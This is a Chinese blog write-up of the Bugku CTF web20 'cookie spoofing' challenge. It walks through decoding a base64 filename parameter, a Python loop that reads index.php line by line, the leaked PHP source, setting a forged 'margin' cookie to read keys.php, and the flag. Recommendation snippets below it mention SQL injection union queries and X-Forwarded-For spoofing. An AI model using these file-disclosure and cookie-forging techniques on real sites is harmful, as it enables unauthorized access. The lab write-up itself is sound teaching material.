Bugku CTF web20(Web)

最新推荐文章于 2021-12-15 22:58:47 发布
最新推荐文章于 2021-12-15 22:58:47 发布
阅读量711 收藏 1
点赞数 1
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ChaoYue_miku/article/details/114322817
版权

0、打开网页,只看到很长的字符串,其实并没有任何提示

查看题目描述: cookies欺骗

rfrgrggggggoaihegfdiofi48ty598whrefeoiahfeiafehbaienvdivrbgtubgtrsgbvaerubaufibryrfrgrggggggoaihegfdiofi48ty598whrefeoiahfeiafehbaienvdivrbgtubgtrsgbvaerubaufibryrfrgrggggggoaihegfdiofi48ty598whrefeoiahfeiafehbaienvdivrbgtubgtrsgbvaerubaufibryrfrgrggggggoaihegfdiofi48ty598whrefeoiahfeiafehbaienvdivrbgtubgtrsgbvaerubaufibryrfrgrggggggoaihegfdiofi48ty598whrefeoiahfeiafehbaienvdivrbgtubgtrsgbvaerubaufibryrfrgrggggggoaihegfdiofi48ty598whrefeoiahfeiafehbaienvdivrbgtubgtrsgbvaerubaufibryrfrgrggggggoaihegfdiofi48ty598whrefeoiahfeiafehbaienvdivrbgtubgtrsgbvaerubaufibryrfrgrggggggoaihegfdiofi48ty598whrefeoiahfeiafehbaienvdivrbgtubgtrsgbvaerubaufibryrfrgrggggggoaihegfdiofi48ty598whrefeoiahfeiafehbaienvdivrbgtubgtrsgbvaerubaufibryrfrgrggggggoaihegfdiofi48ty598whrefeoiahfeiafehbaienvdivrbgtubgtrsgbvaerubaufibryrfrgrggggggoaihegfdiofi48ty598whrefeoiahfeiafehbaienvdivrbgtubgtrsgbvaerubaufibryrfrgrggggggoaihegfdiofi48ty598whrefeoiahfeiafehbaienvdivrbgtubgtrsgbvaerubaufibryrfrgrggggggoaihegfdiofi48ty598whrefeoiahfeiafehbaienvdivrbgtubgtrsgbvaerubaufibryrfrgrggggggoaihegfdiofi48ty598whrefeoiahfeiafehbaienvdivrbgtubgtrsgbvaerubaufibryrfrgrggggggoaihegfdiofi48ty598whrefeoiahfeiafehbaienvdivrbgtubgtrsgbvaerubaufibryrfrgrggggggoaihegfdiofi48ty598whrefeoiahfeiafehbaienvdivrbgtubgtrsgbvaerubaufibryrfrgrggggggoaihegfdiofi48ty598whrefeoiahfeiafehbaienvdivrbgtubgtrsgbvaerubaufibryrfrgrggggggoaihegfdiofi48ty598whrefeoiahfeiafehbaienvdivrbgtubgtrsgbvaerubaufibryrfrgrggggggoaihegfdiofi48ty598whrefeoiahfeiafehbaienvdivrbgtubgtrsgbvaerubaufibryrfrgrggggggoaihegfdiofi48ty598whrefeoiahfeiafehbaienvdivrbgtubgtrsgbvaerubaufibryrfrgrggggggoaihegfdiofi48ty598whrefeoiahfeiafehbaienvdivrbgtubgtrsgbvaerubaufibryrfrgrggggggoaihegfdiofi48ty598whrefeoiahfeiafehbaienvdivrbgtubgtrsgbvaerubaufibry

1、观察url,并将filename部分进行base64解码

通常的源文件应该是index.php

2、对index.php进行base64编码并作为新的filename的参数

3、查看源文件,其中line变量起到控制行数的作用:http://114.67.246.176:13972/index.php?line=1&filename=aW5kZXgucGhw

4、编写python脚本,查看全部源代码

import requests

rs = requests.session()

for i in range(1, 21):
    url = 'http://114.67.246.176:13972/index.php?line={}&filename=aW5kZXgucGhw'.format(i)
    rsg = rs.get(url)
    print(rsg.text)

5、分析PHP源代码,结合题目描述,我们需要上传一个cookies,令margin=margin

error_reporting(0);


$file=base64_decode(isset($_GET['filename'])?$_GET['filename']:"");


$line=isset($_GET['line'])?intval($_GET['line']):0;


if($file=='') header("location:index.php?line=&filename=a2V5cy50eHQ=");


$file_list = array(


'0' =>'keys.txt',


'1' =>'index.php',


);


 


if(isset($_COOKIE['margin']) && $_COOKIE['margin']=='margin'){


$file_list[2]='keys.php';


}


 


if(in_array($file, $file_list)){


$fa = file($file);


echo $fa[$line];


}


?>

至此,我们的目标网址应该是:http://114.67.246.176:13972/index.php?line=&filename=a2V5cy5waHA=(filename替换为keys.php的base64加密后的内容)

6、三种上传方法:

(1)使用BrupSuite抓包后上传

(2)编写python脚本上传

(3)使用Hackbar上传

7、得到flag:flag{4db7115d577eed11439dd72738823e9f}

 

ChaoYue_miku
关注
专栏目录
BugKuCTF WEB
让我再浪一会 的博客
11-24 888
文章目录BugKuCTF WEB一、web2二、计算器三、web基础$_GET四、web基础$_POST五、矛盾六、web3七、域名解析八、你必须让他停下九、变量1十、web5十一、头等舱十二、网站被黑十三、管理员系统十四、web4十五、flag在index里十六、输入密码查看flag BugKuCTF WEB 平台地址 一、web2 进入网页,查看源代码,在其中找到flag 二、计算器 进入网页,根据题目可得知需要输入运算结果,但限制了输入的数字的个数,查看网页的JS代码,将 maxlength =
BugkuCTF练习题解——Web
qq_41739275的博客
08-24 6596
文章目录1.Web22.计算器3.Web基础$_GET4.Web基础$_POST5.矛盾6.Web37.域名解析8.你必须让他停下9.本地包含10.变量111.Web512.头等舱13.网站被黑14.管理员系统15.Web416.flag在index中17.输入密码查看flag18.点击100万次19.备份是个好习惯 1.Web2 打开链接之后是滑稽笑脸,好家伙,吓我一跳,还以为是大bug,然后也没有提示啥的 感觉有点无从下手???别急,打开页面源代码(检查元素也可)瞅瞅 注释部分就是flag了。 2.
bugkuctf解题-WEB
05-04
bugku writeup,web解题writeup,根据网上的writeup自行解题后整理的日记,与大家分享,大家有新方法的也可以评论中告诉我,共同进步。——CTF菜鸟敬上。
BugKu-web篇-web20
jiuyongpinyin的博客
05-30 138
web20 这道题我看评论说是需要脚本,其实也可以不用脚本,可以使用bp抓包,更改line的值,不过比较麻烦,这里我写了个小脚本 有一点需说明,filename参数后面是base64编码,解码后发现是 尝试读取index.php的源码,将filename后面的值换为index.php的base64编码,不过可以直接用我写的脚本 import requests for i in range(20): line = 'line=' + str(i) filename = '&filen
BugkuCTF WEB解题记录 1-5
aap49042的博客
08-06 333
写了一部分的web题,算是把它最基础的一部分做了一遍,以后的几天将持续更新BugkuCTF WEB部分的题解,为了不影响阅读,所以每五道题的题解以一篇文章的形式发表,感谢大家一直以来的支持和理解,共勉~~~ web2 打开链接http://120.24.86.145:8002/web2/ 看到的是一个充满滑稽脸的网页 ,这个题目很简单 我们直接利用F12查看...
Bugku-WEB篇(20')
东方与君语的博客
06-22 806
Bugku-WEBWEB2分析步骤 WEB2 分析 进入环境后,我们会看样的页面,我们点击任何位置都是无效的,首先想到的是查看元素 步骤 先查看源码 细心的同学已经发现了吧,在上图中有一个 将这个flag值复制到刚才要求填写的地方就夺旗成功了,系统就会提示 You already solved this. ...
bugkuweb20 cookies欺骗
EC_Carrot的博客
12-17 409
题目 进入题目看到url http://114.67.246.176:17939/index.php?line=&filename=a2V5cy50eHQ= 很熟眼,line功能应该就是行数,filename就是base64加密后的文件,放进get读取文件 试试读index.php 可以读,换下行数也可以读出来剩下的,但我选择用脚本 import requests def fun(num): session = requests.Session() headers = {"Ac
bugkuctf web 部分wp(自己看得懂)
LJW_wenjingli7的博客
12-15 2520
1.本地管理员 进入网址,查源码,异常的一串n,拉进度条看 == 是base64,解出test123 ,像密码。 这种未知的系统一般要爆破,随便填账号密码,连接代理,打开bp 右键发到repeater,去掉cookie请求,用XXF伪造请求IP,(能考虑到管理员可能是admin,直接省略改名)改user=admin,发送即可 **XXF: X-Forwarded-For:(HTTP的请求端真实的IP) 如题中的:X-Forwarded-For:127.0.0.1 XFF注入..
CTF|BugkuCTF-WEB解题思路
这里是一处长期不更新的博客
06-15 1983
截止至练习题【login4】,仅提供解题思路。 WEB2 按F12直接可得flag 计算器: 直接按F12,将maxlength修改,输入正确结果即可得到flag web基础$_GET URL输入:http://123.206.87.240:8002/get/?what=flag web基础$_POST 使用hackbar工具,按F12,打开Post data,传递what=flag。 矛盾 这里是使用is_numeric遇到%00截断的漏洞,这里构造 http://120.24.86.145:8002.
BUGKU_CTF WEB 20题writeup
热门推荐
单核CPU的小朋友的博客
10-20 4万+
首先知道该页面存在sql注入漏洞。 先判断是否存在注入点。发现是单引号闭合注入。 通过页面回显信息判断当前列数 判断页面中可以回显的点 爆库名 使用命令:0’ union select table_name,2,3,4 from information_schema.tables where table_schema=‘skctf_flag’#爆表名 使用命令‘:0’ union sele...
Bugku web20 Cookies欺骗
weixin_44522540的博客
02-23 290
十六、web20 Cookies欺骗 这道题url很有意思,文件名是经过base64编码的,解码a2v…后是keys.txt,尝试输出keys.txt的第10行,没有输出。。fine,题目给的一串字符串应该是keys.txt里的,具体多少行就不知道了。试下输出index.php的第10行(为什么是第10行呢,我随便输的hhh)记得将index.php编码 /index.php?line=10&filename=aW5kZXgucGhw //index.php base64编码=aW5kZXgucG
BugKu web20 cookies欺骗
m0_49762339的博客
12-24 556
BugKu web20 cookies欺骗 ①打开页面发现一堆乱码什么意思也不知道。然后看到url有两个参数(line=&filename=a2V5cy50eHQ=) ②其中一个是“a2V5cy50eHQ=”base64解码后是“keys.txt”,然后盲猜line是行数。这时就想看看index.php(base64后为aW5kZXgucGhwCg==) ③然后给file参数1,2,3……发现出现了代码。这时就想到爬虫来帮忙收集代码 废话不多说直接上代码: import requests for i
BugkuCTF-WEB部分题解(四)
flying_bird2019的博客
12-02 607
字符?正则? 关于正则表达式推荐一篇博客 正则表达式 <?php highlight_file('2.php'); $key='KEY{********************************}'; $IM= preg_match("/key.*key.{4,7}key:\/.\/(.*key)[a-z][[:punct:]]/i", trim($_GET["id"]), $match); if( $IM ){ die('key is: '.$key); } ?> get参
Bugku CTF Web 解题报告(一)
qq_51090016的博客
01-24 1029
Web11-20题 刚接触ctf的菜鸡,突发奇想写博客,想记录一下自己的写题过程。至于前面十题。。。我舍不得bugku的金币再启动一次场景,只好从11题开始。 Web 11 网站被黑了 我擦,网站被黑了??我一菜鸡哪会解这么高大上的题。打开题目一开,还搞得挺炫酷 这咋办?鼠标右键点不了,F12一看也没啥。我这也太菜了,只好看看大佬怎么做,原来是要用御剑,只好照葫芦画瓢 果然有了,访问下面这个看看 盲猜123456。。果然不对。只好想到用bp爆破。可我还不会爆破啊。。只好搜一下教程现学现用。 跟着大佬.
BugkuCTF-WEB部分题解(二)
flying_bird2019的博客
03-13 527
输入密码得到flag 这道题直接暴力破解 在使用Burp Suite时候设置完Number range 开始爆破出现错误Invalid number settings 百度得以下解决方法 解决问题后爆破得flag 备份是个好习惯 御剑扫描网站发现index.php.bak(后缀为.bak为备份文件) 访问** /index.php.bak **下载文件打开 审计代码 1.$_SERVER[‘R...
BugkuCTF解题报告---WEB
qq_37340753的博客
09-14 812
Web类型解题思路 WEB3 &amp;amp;#75;&amp;amp;#69;&amp;amp;#89;&amp;amp;#123;&amp;amp;#74;&amp;amp;#50;&amp;amp;#115;&amp;amp;#97;&amp;amp;#52;&amp;amp;#50;&amp;amp;#97;&amp;amp;#104;&amp;amp;#74;&amp;amp;
CTFWEBBUGku Ctf 1-7 题解)
RBMan的博客
12-18 1454
这几天做的一些CTFWEB方向的题,才入门所以会写一些心得。1~7题的心得,不喜勿喷。我会坚持下去的。 一.post和get请求方式的不同 1.get:较为简单,如果叫你输入数值的话,直接在URL后面加就行了。格式如下: www.123123123.com/?abc=ABC(所需要提交的参数) 2.post:需要使用火狐上的插件HackBar,先打开该插件,再打开网页,然后URL就会出现在上面的大框中。图片如下: 然后,在下面的框中输入需要的提交的参数,就可以了。 二.关于get请求方式中遇到问题:
BugkuCTF web题解析
qq_37078651的博客
03-12 2757
1、简单 查看源码F12: 2、计算器 输入发现只能输入一个字符,遂查看源码修改maxlength值或者删掉。 3、web基础$_GET GET请求参数what==flag即可. 4、web基础$_POST 使用工具(我用的是hackbar)发送post请求 参数what=flag。 5、矛盾 $num=$_GET['num']; if(!is_nu...
BugkuCTF WEB前五题题解 莽就完事了
linchuzhu_的博客
06-18 843
第一次写题解多担待! 目录(一)web2(二)计算器(三)web基础$_GET(四)web基础$_POST方法一方法二(五)矛盾 (一)web2 http://123.206.87.240:8002/web2/. 打开网页后是闪瞎眼的表情包,不过不要紧,直接F12查找flag。 完毕。 (二)计算器 http://123.206.87.240:8002/yanzhengma/ 还是老样子,遇题先按F12,没有发现什么特殊的地方。 尝试在输入框中输入答案,发现只能输入一位数字。 接着在开发者工具中发现 出
BugkuCTF 字符?正则?
最新发布
08-11
BugkuCTF 是一个CTF(Capture The Flag)比赛平台,提供了一系列的网络安全挑战题目供参赛者解决。在这个平台上,参赛者需要利用自己的技术和知识,寻找并利用目标系统中的漏洞,获取相应的flag来得分。 关于字符和...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

ChaoYue_miku

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值